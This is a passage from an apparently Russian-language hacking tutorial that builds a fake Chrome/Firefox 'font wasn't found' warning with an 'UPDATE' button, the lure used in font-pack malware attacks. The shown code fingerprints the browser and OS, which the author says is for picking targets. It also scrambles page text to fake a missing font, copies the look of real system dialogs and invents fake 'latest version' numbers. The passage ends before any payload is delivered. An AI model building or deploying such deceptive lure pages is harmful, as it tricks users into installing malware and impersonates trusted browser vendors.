box-shadow: 0 4px 5px rgba(0, 0, 0, .16);
}
.form_submit {
border-radius: 2px;
outline: none;
padding: 10px 8px;
z-index: 9999;
}
.form_submit:hover {
background: rgba(0, 0, 0, .1);
}
.form_submit:focus {
background: rgba(0, 0, 0, .1);
}
.form_submit:active {
background: rgba(0, 0, 0, .2);
}
.Gfzyee:disabled, .Gfzyee[disabled]:not([disabled=false]) {
pointer-events: none;
color: rgba(0, 0, 0, .26) !important;
background: rgba(0, 0, 0, .12);
box-shadow: none;
box-shadow: none;
}
.Gfzyee:disabled .form_submit, .Gfzyee[disabled]:not([disabled=false]) .form_submit {
background-color: transparent;
}
.DKlyaf {
background: #4285f4;
}
.Loxgyb {
color: #fff;
}
.vk_c
{
background: #FFF;
box-shadow: 0 2px 2px 0 rgba(0,0,0,0.16), 0 0 0 1px rgba(0,0,0,0.08);
border: 1px;
border-radius: 2px;
display: block;
position: fixed;
padding: 20px 16px 24px 16px;
z-index: 9999;
/* left: 30%;
top: 40%;*/
width: 800px;
}
.close {
cursor: default;
display: block;
float: right;
font-size: 18px;
line-height: 1;
color: #000;
text-shadow: 0 1px 0 #fff;
opacity: .2;
margin-top: -8px;
margin-right: -4px;
text-decoration: none;
}
.close:hover {
opacity: 1;
}
#warning_wrapper {
text-align: right;
position: absolute;
top: 0;
}
#chrome_logo {
float: right;
margin-right: 12px;
width: 130px;
}
.warning_text {
padding: 15px 24px;
padding-bottom: 0;
text-align: left;
line-height: 1.24;
font-size: small;
font-family: arial,sans-serif;
}
Идентификаторы в разметке не особо читабельные, но их читабельность здесь особо и не нужна.
1.2. Получить системное сообщение от Firefox в таком же виде, как и в Chrome (маска поверх страницы, модальное окно с сообщением) тяжелее. Я особо времени не тратил и скопировал хромовскую разметку. Изменил только стили:
Code:Copy to clipboard
.yAVMkd {
overflow: hidden;
}
.KJXbRb {
display: table-cell;
vertical-align: middle;
color: rgba(256, 256, 256, .87);
}
.yAVMkd {
margin-top: 6px;
margin-bottom: 24px;
}
.KJXbRb {
font-size: 24px;
line-height: 28px;
padding-left: 24px;
}
.ZPJnFe {
margin-top: 11px;
margin-left: 50px;
}
.FZ2Txe {
margin-right: 8px;
}
.ZPJnFe .FZ2Txe {
margin-right: 8px;
}
.U8shWc {
background-color: transparent;
border: none;
border-radius: 2px;
border-radius: 2px;
box-sizing: border-box;
cursor: default;
display: inline-block;
font-size: 14px;
font-weight: 500;
height: 36px;
line-height: 16px;
padding: 10px 8px;
text-transform: uppercase;
margin: 0 4px;
min-width: 88px;
outline: none;
position: relative;
text-align: center;
text-decoration: none !important;
-webkit-user-select: none;
white-space: nowrap;
}
.U8shWc:disabled, .U8shWc[disabled]:not([disabled=false]) {
pointer-events: none;
}
.U8shWc.fSXIc {
min-width: 64px;
}
.U8shWc.Vy8nid {
color: rgba(0, 0, 0, .87);
}
.Vy8nid:hover {
background-color: rgba(153, 153, 153, .2);
}
.Vy8nid:focus {
background-color: rgba(153, 153, 153, .2);
}
.Vy8nid:active {
background-color: rgba(153, 153, 153, .4);
}
.U8shWc.Vy8nid:disabled, .U8shWc.Vy8nid[disabled]:not([disabled=false]) {
color: rgba(0, 0, 0, .26) !important;
}
.MnJuPb {
padding: 0 4px;
}
.ZPJnFe .LN7Ux {
margin-left: 0px;
}
g-raised-button {
display: inline-block;
margin: 0 4px;
position: relative;
}
.Gfzyee {
box-sizing: border-box;
cursor: default;
font-size: 14px;
font-weight: 500;
min-width: 88px;
outline: none;
text-align: center;
transition: box-shadow 200ms cubic-bezier(0.4, 0, 0.2, 1);
-webkit-user-select: none;
white-space: nowrap;
border: 0;
border-radius: 2px;
box-shadow: 0 1px 1px rgba(0, 0, 0, .16);
box-shadow: 0 1px 1px rgba(0, 0, 0, .16);
line-height: 16px;
text-transform: uppercase;
}
.Gfzyee:active {
outline: none;
box-shadow: 0 4px 5px rgba(0, 0, 0, .16);
box-shadow: 0 4px 5px rgba(0, 0, 0, .16);
}
.form_submit {
background-color: rgb(5, 159, 221);
border-radius: 2px;
border: 2px;
color: #FFF;
outline: none;
padding: 10px 8px;
z-index: 9999;
}
.form_submit:hover {
background: #02739E;
}
.form_submit:focus {
background: #02597A;
}
.form_submit:active {
background: #02597A;
}
.Gfzyee:disabled, .Gfzyee[disabled]:not([disabled=false]) {
pointer-events: none;
color: rgba(0, 0, 0, .26) !important;
background: rgba(0, 0, 0, .12);
box-shadow: none;
box-shadow: none;
}
.Gfzyee:disabled .form_submit, .Gfzyee[disabled]:not([disabled=false]) .form_submit {
background-color: transparent;
}
.DKlyaf {
background: #4285f4;
}
.Loxgyb {
color: #fff;
}
.vk_c
{
background: rgba(0,146,213,1);
background: -moz-linear-gradient(-45deg, rgba(0,146,213,1) 0%, rgba(11,167,219,1) 84%, rgba(13,157,214,1) 85%, rgba(21,160,230,1) 100%);
background: -webkit-gradient(left top, right bottom, color-stop(0%, rgba(0,146,213,1)), color-stop(84%, rgba(11,167,219,1)), color-stop(85%, rgba(13,157,214,1)), color-stop(100%, rgba(21,160,230,1)));
background: -webkit-linear-gradient(-45deg, rgba(0,146,213,1) 0%, rgba(11,167,219,1) 84%, rgba(13,157,214,1) 85%, rgba(21,160,230,1) 100%);
background: -o-linear-gradient(-45deg, rgba(0,146,213,1) 0%, rgba(11,167,219,1) 84%, rgba(13,157,214,1) 85%, rgba(21,160,230,1) 100%);
background: -ms-linear-gradient(-45deg, rgba(0,146,213,1) 0%, rgba(11,167,219,1) 84%, rgba(13,157,214,1) 85%, rgba(21,160,230,1) 100%);
background: linear-gradient(135deg, rgba(0,146,213,1) 0%, rgba(11,167,219,1) 84%, rgba(13,157,214,1) 85%, rgba(21,160,230,1) 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#0092d5', endColorstr='#15a0e6', GradientType=1 );
box-shadow: 0 2px 2px 0 rgba(0,0,0,0.16), 0 0 0 1px rgba(0,0,0,0.08);
border: 3px;
border-radius: 2px;
display: block;
position: fixed;
padding: 20px 16px 24px 16px;
z-index: 9999;
color: rgba(256, 256, 256, .87);
width: 800px;
}
.close {
cursor: default;
display: block;
float: right;
font-size: 18px;
line-height: 1;
color: #000;
text-shadow: 0 1px 0 #fff;
opacity: .2;
margin-top: -8px;
margin-right: -4px;
text-decoration: none;
}
.close:hover {
color: #FFF;
opacity: 1;
}
#warning_wrapper {
text-align: right;
position: absolute;
top: 0;
}
.warning_text {
padding: 15px 24px;
padding-bottom: 0;
text-align: left;
line-height: 1.24;
font-size: small;
font-family: arial,sans-serif;
}
.update_info {
padding: 15px 24px;
float: left;
font-size: small;
}
.update_info tbody {
background: #F5F5F5;
text-align: left;
}
.update_info td {
padding-top: 3px;
padding-right: 2px;
}
.update_info tr {
display: block;
}
.update_info tr:nth-child(even) {
background: #FFF;
color: #000;
}
.update_info tr:nth-child(odd) {
background: rgb(87,187, 55);
color: #FFF;
}
#firefox_logo {
float: right;
margin-right: 12px;
width: 40px;
}
Базовую разметку оборачиваем в warning_wrapper, добавляем маску и оборачиваем это всё в outer_warning_wrapper. Вот что получается:
Code:Copy to clipboard
<div id="outer_warning_wrapper">
<div class="mask"></div>
<div id="warning_wrapper" >
<div class="yAVMkd vk_c">
<a href="#" class="close">X</a>
<img src="browser_logo.png" alt="" id="{chrome_logo || firefox_logo}">
<div>
<div class="KJXbRb">The "Some font" font wasn't found</div>
</div>
<div>
<div class="warning_text">
The web page you are trying to load is displayed incorrectly, as it uses the "Some font" font. To fix the error and display the text you have to update the "{Browser} Font Pack".
</div>
<div class="ZPJnFe">
<div style="padding-right: 18px">
<g-flat-button class="FZ2Txe U8shWc Vy8nid" id="cnsd" style="color:#4285f4" role="button" tabindex="0">CANCEL</g-flat-button>
<g-raised-button class="LN7Ux Gfzyee DKlyaf Loxgyb" id="cnsr" role="button" tabindex="0" >
<div class="form_submit">
<span class="MnJuPb">UPDATE</span>
</div>
</g-raised-button>
</div>
</div>
</div>
</div>
</div>
</div>
2. Приступаем к написанию js-скрипта. Функционал скрипта:
- определение браузера, в котором он выполняется (чтобы знать сообщение
какого браузера эмулировать);
- определение ОС пользователя (чтобы выполнять атаки только на тех, кто нам
нужен);
- изменение текста на веб-странице "битыми" символами (создание иллюзии, что
действительно какой-то шрифт отсутствует);
- выполнение анимации плавного "всплывания" и такого же закрытия сообщения
(для максимальной идентичности системному сообщению);
- обработка действий пользователя (клик на "маску", кнопки ...);
- создание DOM-элементов и присваивание им свойств (внедрение разметки и
стилей, которые у нас уже есть, в страницу);
- запись в Cookies, что текущий пользователь уже "обновил шрифты".
Реализацию первых двух пунктов можно найти на stackoverflow:
Code:Copy to clipboard
(function (window) {
{
var unknown = '-';
// screen
var screenSize = '';
if (screen.width) {
width = (screen.width) ? screen.width : '';
height = (screen.height) ? screen.height : '';
screenSize += '' + width + " x " + height;
}
// browser
var nVer = navigator.appVersion;
var nAgt = navigator.userAgent;
var browser = navigator.appName;
var version = '' + parseFloat(navigator.appVersion);
var majorVersion = parseInt(navigator.appVersion, 10);
var nameOffset, verOffset, ix;
// Opera
if ((verOffset = nAgt.indexOf('Opera')) != -1) {
browser = 'Opera';
version = nAgt.substring(verOffset + 6);
if ((verOffset = nAgt.indexOf('Version')) != -1) {
version = nAgt.substring(verOffset + 8);
}
}
// Opera Next
if ((verOffset = nAgt.indexOf('OPR')) != -1) {
browser = 'Opera';
version = nAgt.substring(verOffset + 4);
}
// Edge
else if ((verOffset = nAgt.indexOf('Edge')) != -1) {
browser = 'Microsoft Edge';
version = nAgt.substring(verOffset + 5);
}
// MSIE
else if ((verOffset = nAgt.indexOf('MSIE')) != -1) {
browser = 'Microsoft Internet Explorer';
version = nAgt.substring(verOffset + 5);
}
// Chrome
else if ((verOffset = nAgt.indexOf('Chrome')) != -1) {
browser = 'Chrome';
version = nAgt.substring(verOffset + 7);
}
// Safari
else if ((verOffset = nAgt.indexOf('Safari')) != -1) {
browser = 'Safari';
version = nAgt.substring(verOffset + 7);
if ((verOffset = nAgt.indexOf('Version')) != -1) {
version = nAgt.substring(verOffset + 8);
}
}
// Firefox
else if ((verOffset = nAgt.indexOf('Firefox')) != -1) {
browser = 'Firefox';
version = nAgt.substring(verOffset + 8);
}
// MSIE 11+
else if (nAgt.indexOf('Trident/') != -1) {
browser = 'Microsoft Internet Explorer';
version = nAgt.substring(nAgt.indexOf('rv:') + 3);
}
// Other browsers
else if ((nameOffset = nAgt.lastIndexOf(' ') + 1) < (verOffset = nAgt.lastIndexOf('/'))) {
browser = nAgt.substring(nameOffset, verOffset);
version = nAgt.substring(verOffset + 1);
if (browser.toLowerCase() == browser.toUpperCase()) {
browser = navigator.appName;
}
}
// trim the version string
if ((ix = version.indexOf(';')) != -1) version = version.substring(0, ix);
if ((ix = version.indexOf(' ')) != -1) version = version.substring(0, ix);
if ((ix = version.indexOf(')')) != -1) version = version.substring(0, ix);
majorVersion = parseInt('' + version, 10);
if (isNaN(majorVersion)) {
version = '' + parseFloat(navigator.appVersion);
majorVersion = parseInt(navigator.appVersion, 10);
}
// mobile version
var mobile = /Mobile|mini|Fennec|Android|iP(ad|od|hone)/.test(nVer);
// cookie
var cookieEnabled = (navigator.cookieEnabled) ? true : false;
if (typeof navigator.cookieEnabled == 'undefined' && !cookieEnabled) {
document.cookie = 'testcookie';
cookieEnabled = (document.cookie.indexOf('testcookie') != -1) ? true : false;
}
// system
var os = unknown;
var clientStrings = [
{s:'Windows 10', r:/(Windows 10.0|Windows NT 10.0)/},
{s:'Windows 8.1', r:/(Windows 8.1|Windows NT 6.3)/},
{s:'Windows 8', r:/(Windows 8|Windows NT 6.2)/},
{s:'Windows 7', r:/(Windows 7|Windows NT 6.1)/},
{s:'Windows Vista', r:/Windows NT 6.0/},
{s:'Windows Server 2003', r:/Windows NT 5.2/},
{s:'Windows XP', r:/(Windows NT 5.1|Windows XP)/},
{s:'Windows 2000', r:/(Windows NT 5.0|Windows 2000)/},
{s:'Windows ME', r:/(Win 9x 4.90|Windows ME)/},
{s:'Windows 98', r:/(Windows 98|Win98)/},
{s:'Windows 95', r:/(Windows 95|Win95|Windows_95)/},
{s:'Windows NT 4.0', r:/(Windows NT 4.0|WinNT4.0|WinNT|Windows NT)/},
{s:'Windows CE', r:/Windows CE/},
{s:'Windows 3.11', r:/Win16/},
{s:'Android', r:/Android/},
{s:'Open BSD', r:/OpenBSD/},
{s:'Sun OS', r:/SunOS/},
{s:'Linux', r:/(Linux|X11)/},
{s:'iOS', r:/(iPhone|iPad|iPod)/},
{s:'Mac OS X', r:/Mac OS X/},
{s:'Mac OS', r:/(MacPPC|MacIntel|Mac_PowerPC|Macintosh)/},
{s:'QNX', r:/QNX/},
{s:'UNIX', r:/UNIX/},
{s:'BeOS', r:/BeOS/},
{s:'OS/2', r:/OS\/2/},
{s:'Search Bot', r:/(nuhk|Googlebot|Yammybot|Openbot|Slurp|MSNBot|Ask Jeeves\/Teoma|ia_archiver)/}
];
for (var id in clientStrings) {
var cs = clientStrings[id];
if (cs.r.test(nAgt)) {
os = cs.s;
break;
}
}
var osVersion = unknown;
if (/Windows/.test(os)) {
osVersion = /Windows (.*)/.exec(os)[1];
os = 'Windows';
}
switch (os) {
case 'Mac OS X':
osVersion = /Mac OS X (10[\.\_\d]+)/.exec(nAgt)[1];
break;
case 'Android':
osVersion = /Android ([\.\_\d]+)/.exec(nAgt)[1];
break;
case 'iOS':
osVersion = /OS (\d+)_(\d+)_?(\d+)?/.exec(nVer);
osVersion = osVersion[1] + '.' + osVersion[2] + '.' + (osVersion[3] | 0);
break;
}
// flash (you'll need to include swfobject)
/* script src="//ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js" */
var flashVersion = 'no check';
if (typeof swfobject != 'undefined') {
var fv = swfobject.getFlashPlayerVersion();
if (fv.major > 0) {
flashVersion = fv.major + '.' + fv.minor + ' r' + fv.release;
}
else {
flashVersion = unknown;
}
}
}
window.jscd = {
screen: screenSize,
browser: browser,
browserVersion: version,
browserMajorVersion: majorVersion,
mobile: mobile,
os: os,
osVersion: osVersion,
cookies: cookieEnabled,
flashVersion: flashVersion
};
}(this));
Шифровка веб-страницы:
Code:Copy to clipboard
function encodedSymbol(symbol) {
var encoded = '';
switch(symbol) {
case 'A':
encoded = '-';
break;
case 'a':
encoded = '?';
break;
case 'B':
encoded = 'a';
break;
case 'b':
encoded = 'U';
break;
case 'C':
encoded = '?';
break;
case 'c':
encoded = 'a';
break;
case 'D':
encoded = '?';
break;
case 'd':
encoded = 'C';
break;
case 'E':
encoded = 'i';
break;
case 'e':
encoded = 'O';
break;
case 'F':
encoded = 'R';
break;
case 'f':
encoded = 'A';
break;
case 'G':
encoded = 'l';
break;
case 'g':
encoded = '?';
break;
case 'H':
encoded = 'L';
break;
case 'h':
encoded = 'I';
break;
case 'I':
encoded = 's';
break;
case 'i':
encoded = '?';
break;
case 'J':
encoded = 'z';
break;
case 'j':
encoded = 'U';
break;
case 'K':
encoded = 't';
break;
case 'k':
encoded = 'a';
break;
case 'L':
encoded = 'd';
break;
case 'l':
encoded = '?';
break;
case 'M':
encoded = '?';
break;
case 'm':
encoded = '?';
break;
case 'N':
encoded = '?';
break;
case 'n':
encoded = '?';
break;
case 'O':
encoded = '+';
break;
case 'o':
encoded = '§';
break;
case 'P':
encoded = '¦';
break;
case 'p':
encoded = '¦';
break;
case 'Q':
encoded = '¬';
break;
case 'q':
encoded = '+';
break;
case 'R':
encoded = '¦';
break;
case 'r':
encoded = '©';
break;
case 'S':
encoded = '?';
break;
case 's':
encoded = 'O';
break;
case 'T':
encoded = '?';
break;
case 't':
encoded = '?';
break;
case 'U':
encoded = '‰';
break;
case 'u':
encoded = '…';
break;
case 'V':
encoded = '?';
break;
case 'v':
encoded = '3';
break;
case 'W':
encoded = '¬';
break;
case 'w':
encoded = '¬';
break;
case 'X':
encoded = 'i';
break;
case 'x':
encoded = '»';
break;
case 'Y':
encoded = '?';
break;
case 'y':
encoded = 'U';
break;
case 'Z':
encoded = ',';
break;
case 'z':
encoded = '4';
break;
case '0':
encoded = '?';
break;
case '1':
encoded = '?';
break;
case '2':
encoded = '?';
break;
case '3':
encoded = '?';
break;
case '4':
encoded = '?';
break;
case '5':
encoded = '?';
break;
case '6':
encoded = '.';
break;
case '7':
encoded = '?';
break;
case '8':
encoded = '?';
break;
case '9':
encoded = '†';
break;
case '.':
encoded = 'L';
break;
case ',':
encoded = 'Ѕ';
break;
case '-':
encoded = 'T';
break;
case '(':
encoded = '1';
break;
case ')':
encoded = '-';
break;
}
return encoded;
}
function encodeHtmlText(htmlText) {
var isCharSystem = false;
var isCharEntity = false;
var encodedStr = '';
for(var i = 0; i < htmlText.length; i++)
{
switch(htmlText[i]) {
case '<':
isCharSystem = true;
encodedStr += htmlText[i];
break;
case '>':
isCharSystem = false;
encodedStr += htmlText[i];
break;
case '&':
if(isCharEntity == false)
isCharEntity = true;
encodedStr += htmlText[i];
break;
case ';':
if(isCharEntity)
isCharEntity = false;
encodedStr += htmlText[i];
break;
default:
if(!isCharSystem && !isCharEntity)
encodedStr += encodedSymbol(htmlText[i]);
else
encodedStr += htmlText[i];
}
}
return encodedStr;
}
Функции, отвечающие за анимации:
Code:Copy to clipboard
function closingWarningWindow() {
fadeToggle(document.getElementById("outer_warning_wrapper"));
setTimeout(function() { fadeToggle(document.getElementById("outer_warning_wrapper")) }, 2000);
};
function setOpacity(fading_div, opacity) {
fading_div.style.opacity = (opacity / 100);
fading_div.style.filter = 'alpha(opacity=' + opacity + ')';
}
function fade(fading_div, opacity, opacity_change_value) {
if (opacity <= 1) {
fading_div.style.display = 'none';
return;
}
if (opacity >= 100){
setOpacity(fading_div, 100);
return;
}
setOpacity(fading_div, opacity);
setTimeout(function() {
fade(fading_div, opacity + opacity_change_value, opacity_change_value);
}, 1);
}
function fadeToggle(element) {
if(element.style.display == 'block')
fade(element, 99, -5);
else
{
element.style.display = 'block';
fade(element, 2, 5);
}
}
Функция, говорящая сама за себя (cookie):
Code:Copy to clipboard
function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
Построение иерархии DOM-элементов в веб-странице:
Code:Copy to clipboard
function createWarningWindowElements() {
var outer_warning_wrapper = document.createElement('div');
outer_warning_wrapper.id = "outer_warning_wrapper";
var mask = document.createElement('div');
mask.className = "mask";
var warning_wrapper = document.createElement('div');
warning_wrapper.id = "warning_wrapper";
var el1 = document.createElement('div');
el1.className = "yAVMkd";
el1.classList.add("vk_c");
var close = document.createElement('a');
close.className = "close";
close.innerText = "X";
var manufacturer_logo = document.createElement('img');
manufacturer_logo.id = "manufacturer_logo";
manufacturer_logo.style.float = "right";
manufacturer_logo.style.marginRight = "12px";
var el2 = document.createElement('div');
var KJXbRb = document.createElement('div');
KJXbRb.className = "KJXbRb";
KJXbRb.innerText = "The \"Some font\" font wasn't found";
el2.appendChild(KJXbRb);
var el3 = document.createElement('div');
var warning_text = document.createElement('div');
warning_text.className = "warning_text";
var update_info = document.createElement('div');
update_info.className = "update_info";
var update_info_table = document.createElement('table');
update_info_table.id = 'update_info_table';
var update_info_table_tbody = document.createElement('tbody');
var tr1 = document.createElement('tr');
var td1 = document.createElement('td');
td1.className = "update_info_header";
td1.innerText = "Manufacturer:";
var td2 = document.createElement('td');
td2.id = "manufacturer";
tr1.appendChild(td1);
tr1.appendChild(td2);
var tr2 = document.createElement('tr');
var td3 = document.createElement('td');
td3.className = "update_info_header";
td3.innerText = "Current version:";
var td4 = document.createElement('td');
td4.id = "current_version";
tr2.appendChild(td3);
tr2.appendChild(td4);
var tr3 = document.createElement('tr');
var td5 = document.createElement('td');
td5.className = "update_info_header";
td5.innerText = "Latest version:";
var td6 = document.createElement('td');
td6.id = "latest_version";
tr3.appendChild(td5);
tr3.appendChild(td6);
update_info_table_tbody.appendChild(tr1);
update_info_table_tbody.appendChild(tr2);
update_info_table_tbody.appendChild(tr3);
update_info_table.appendChild(update_info_table_tbody);
update_info.appendChild(update_info_table);
var ZPJnFe = document.createElement('div');
ZPJnFe.className = "ZPJnFe";
var el4 = document.createElement('div');
el4.style.paddingRight = "18px";
var cnsd = document.createElement('g-flat-button');
cnsd.classList.add("FZ2Txe");
cnsd.classList.add("U8shWc");
cnsd.classList.add("Vy8nid");
cnsd.id = "cnsd";
cnsd.style.color = "#4285f4";
cnsd.role = "button";
cnsd.tabindex = 0;
cnsd.innerText = "CANCEL";
var cnsr = document.createElement('g-raised-button');
cnsr.className = "LN7Ux";
cnsr.classList.add("Gfzyee");
cnsr.classList.add("DKlyaf");
cnsr.classList.add("Loxgyb");
cnsr.id += "cnsr";
cnsr.role = "button";
cnsr.tabindex = 0;
var form_submit = document.createElement('div');
form_submit.className = "form_submit";
var MnJuPb = document.createElement('span');
MnJuPb.className = "MnJuPb";
MnJuPb.innerText = "UPDATE";
form_submit.appendChild(MnJuPb);
cnsr.appendChild(form_submit);
el4.appendChild(cnsd);
el4.appendChild(cnsr);
ZPJnFe.appendChild(el4);
el3.appendChild(warning_text);
el3.appendChild(update_info);
el3.appendChild(ZPJnFe);
el1.appendChild(close);
el1.appendChild(manufacturer_logo);
el1.appendChild(el2);
el1.appendChild(el3);
warning_wrapper.appendChild(el1);
outer_warning_wrapper.appendChild(mask);
outer_warning_wrapper.appendChild(warning_wrapper);
document.getElementsByTagName("body")[0].appendChild(outer_warning_wrapper);
}
Заполнение таблицы версий браузера:
Code:Copy to clipboard
function fillUpdateInfoTable() {
var manufacturer_name = "";
if(jscd.browser == "Chrome")
manufacturer_name = "Google Inc.";
else if(jscd.browser == "Firefox")
manufacturer_name = "Mozilla Corp."
document.getElementById("manufacturer").innerText = manufacturer_name;
document.getElementsByClassName("warning_text")[0].innerText = "The web page you are trying to load is displayed incorrectly, as it uses the \"Some font\" font. To fix the error and display the text you have to update the \"" + jscd.browser + " Font Pack\"."
document.getElementById("current_version").innerText =
window.jscd.browser + " Font Pack ";
addStrongText(document.getElementById("current_version"), window.jscd.browserVersion);
var browserVersionParts = window.jscd.browserVersion.split(".");
var latestVersion_p1 = parseInt(browserVersionParts[0]) + Math.floor((Math.random() * 2) + 1);
var latestVersion_p2 = parseInt(browserVersionParts[1]) + Math.floor((Math.random() * 3));
var latestVersion_p3 = parseInt(browserVersionParts[2]);
var latestVersion_p4 = parseInt(browserVersionParts[3]);
if(isNaN(latestVersion_p3))
latestVersion_p3 = 0;
latestVersion_p3 += Math.floor((Math.random() * 2000) + 1);
if(isNaN(latestVersion_p4))
latestVersion_p4 = 0;
latestVersion_p4 += Math.floor((Math.random() * 80) + 1);
var latestVersionStr = latestVersion_p1 + "." + latestVersion_p2 + "." +
latestVersion_p3 + "." + latestVersion_p4;
document.getElementById("latest_version").innerText = window.jscd.browser + " Font Pack ";
addStrongText(document.getElementById("latest_version"), latestVersionStr);
}
Установка стилей соответствующих браузеров:
Code:Copy to clipboard
function setChromeDefaultStyles() {
document.getElementsByClassName("vk_c")[0].style.background = "#FFF";
document.getElementsByClassName("vk_c")[0].style.color = "#000";
document.getElementsByClassName("KJXbRb")[0].style.color = "rgba(0, 0, 0, .87)";
// document.getElementById('cnsd').style.display = "block";
document.getElementById("manufacturer_logo").src = "Chrome.png";
document.getElementById("manufacturer_logo").style.width = "130px";
// hover effect begin
document.getElementsByClassName("form_submit")[0].addEventListener("mouseenter", function() {
document.getElementsByClassName("form_submit")[0].style.background = "rgba(0, 0, 0, .1)";
});
document.getElementsByClassName("form_submit")[0].addEventListener("mouseleave", function() {
document.getElementsByClassName("form_submit")[0].style.background = "#4285f4";
})
// hover effect end
// setting bottom border at table
document.getElementById("update_info_table").lastElementChild.lastElementChild.style.borderBottom = "1px solid #BDBDBD";
var tableRows = document.getElementById("update_info_table").lastElementChild.children;
for(var i = 0; i < tableRows.length; i++)
tableRows[i].style.borderTop = "1px solid #BDBDBD";
tableRows[tableRows.length - 1].style.color = "rgb(21, 159, 92)";
}
function setFirefoxDefaultStyles() {
var vk_c = document.getElementsByClassName("vk_c")[0];
vk_c.style.background = "rgba(0,146,213,1)";
vk_c.style.backgroundImage = "-moz-linear-gradient(-45deg, rgba(0,146,213,1) 0%, rgba(10,163,218,1) 84%, rgba(17,154,218,1) 85%, rgba(20,153,220,1) 100%)";
vk_c.style.backgroundImage = "-webkit-gradient(left top, right bottom, color-stop(0%, rgba(0,146,213,1)), color-stop(84%, rgba(10,163,218,1)), color-stop(85%, rgba(17,154,218,1)), color-stop(100%, rgba(20,153,220,1)))";
vk_c.style.backgroundImage = "-webkit-linear-gradient(-45deg, rgba(0,146,213,1) 0%, rgba(10,163,218,1) 84%, rgba(17,154,218,1) 85%, rgba(20,153,220,1) 100%)";
vk_c.style.backgroundImage = "linear-gradient(135deg, rgba(0,146,213,1) 0%, rgba(10,163,218,1) 84%, rgba(17,154,218,1) 85%, rgba(20,153,220,1) 100%)";
vk_c.style.filter = "progid:DXImageTransform.Microsoft.gradient( startColorstr='#0092d5', endColorstr='#1499dc', GradientType=1 )";
vk_c.style.color = "rgba(256, 256, 256, .87)";
document.getElementById('cnsd').style.display = "none";
document.getElementById("manufacturer_logo").src = "firefox.png";
document.getElementById("manufacturer_logo").style.width = "40px";
var updateButton = document.getElementsByClassName("form_submit")[0];
var ub_defaultBgColor = "rgb(231, 126, 17)";
updateButton.style.background = ub_defaultBgColor;
updateButton.style.color = "#FFF";
// update button hover effect begin
updateButton.addEventListener("mouseenter", function() {
document.getElementsByClassName("form_submit")[0].style.background = "rgb(214, 115, 16)";
});
updateButton.addEventListener("mouseleave", function() {
document.getElementsByClassName("form_submit")[0].style.background = ub_defaultBgColor;
})
// hover effect end
var tableRows = document.getElementById("update_info_table").lastElementChild.children;
for(var i = 0; i < tableRows.length; i++)
if(i % 2 == 0)
{
tableRows[i].style.background = "rgb(87,187, 55)";
tableRows[i].style.color = "#FFF";
}
else
{
tableRows[i].style.background = "#FFF";
tableRows[i].style.color = "#000";
}
// close button hover effect begin
document.getElementsByClassName("close")[0].addEventListener("mouseenter", function() {
document.getElementsByClassName("close")[0].style.color = "#FFF";
});
document.getElementsByClassName("close")[0].addEventListener("mouseleave", function() {
document.getElementsByClassName("close")[0].style.color = "#000";
})
// hover effect end
}
function setCommonDefaultStyles() {
var yAVMkd = document.getElementsByClassName("yAVMkd")[0];
yAVMkd.style.marginTop = "6px";
yAVMkd.style.marginBottom = "24px";
yAVMkd.style.overflow = "hidden";
var KJXbRb = document.getElementsByClassName("KJXbRb")[0];
KJXbRb.style.display = "table-cell";
KJXbRb.style.verticalAlign = "middle";
KJXbRb.style.color = "rgba(256, 256, 256, .87)";
KJXbRb.style.fontSize = "24px";
KJXbRb.style.lineHeight = "28px";
KJXbRb.style.paddingLeft = "24px";
var ZPJnFe = document.getElementsByClassName("ZPJnFe")[0];
ZPJnFe.style.marginTop = "11px";
ZPJnFe.style.marginLeft = "50px";
ZPJnFe.style.marginRight = "8px";
document.getElementsByClassName("FZ2Txe")[0].style.marginRight = "8px";
var U8shWc = document.getElementsByClassName("U8shWc")[0];
U8shWc.style.backgroundColor = "transparent";
U8shWc.style.border = "none";
U8shWc.style.borderRadius = "2px";
U8shWc.style.boxSizing = "border-box";
U8shWc.style.cursor = "default";
U8shWc.style.display = "inline-block";
U8shWc.style.fontSize = "14px";
U8shWc.style.fontWeight = "500";
U8shWc.style.height = "36px";
U8shWc.style.lineHeight = "16px";
U8shWc.style.padding = "10px 8px";
U8shWc.style.textTransform = "uppercase";
U8shWc.style.margin = "0 4px";
U8shWc.style.minWidth = "88px";
U8shWc.style.outline = "none";
U8shWc.style.position = "relative";
U8shWc.style.textAlign = "center";
U8shWc.style.textDecoration = "none !important";
U8shWc.style["-webkit-user-select"] = "none";
U8shWc.style.whiteSpace = "nowrap";
var Vy8nid = document.getElementsByClassName("Vy8nid")[0];
// Vy8nid.style.color = "rgba(0, 0, 0, .87)";
// hover effect begin
Vy8nid.addEventListener("mouseenter", function() {
document.getElementsByClassName("Vy8nid")[0].style.background = "rgba(153, 153, 153, .2)";
});
Vy8nid.addEventListener("mouseleave", function() {
document.getElementsByClassName("Vy8nid")[0].style.background = "transparent";
});
Vy8nid.addEventListener("focus", function() {
document.getElementsByClassName("Vy8nid")[0].style.background = "rgba(153, 153, 153, .2)";
});
Vy8nid.addEventListener("focus", function() {
document.getElementsByClassName("Vy8nid")[0].style.background = "rgba(153, 153, 153, .2)";
});
// hover effect end
document.getElementsByClassName("MnJuPb")[0].style.padding = "0 4px";
document.getElementsByClassName("LN7Ux")[0].style.marginLeft = "0px";
var g_raised_buttons = document.getElementsByTagName("g-raised-button");
for(var i = 0; i < g_raised_buttons.length; i++){
g_raised_buttons[i].style.display = "inline-block";
g_raised_buttons[i].style.margin = "0 4px";
g_raised_buttons[i].style.position = "relative";
}
var Gfzyee = document.getElementsByClassName("Gfzyee")[0];
Gfzyee.style.boxSizing = "border-box";
Gfzyee.style.cursor = "default";
Gfzyee.style.fontSize = "14px";
Gfzyee.style.fontWeight = "500";
Gfzyee.style.minWidth = "88px";
Gfzyee.style.outline = "none";
Gfzyee.style.textAlign = "center";
Gfzyee.style.transition = "box-shadow 200ms cubic-bezier(0.4, 0, 0.2, 1)";
Gfzyee.style["-webkit-user-select"] = "none";
Gfzyee.style.whiteSpace = "nowrap";
Gfzyee.style.border = "0";
Gfzyee.style.borderRadius = "2px";
Gfzyee.style.boxShadow = "0 1px 1px rgba(0, 0, 0, .16)";
Gfzyee.style.lineHeight = "16px";
Gfzyee.style.textTransform = "uppercase";
var form_submit = document.getElementsByClassName("form_submit")[0];
form_submit.style.borderRadius = "2px";
form_submit.style.outline = "none";
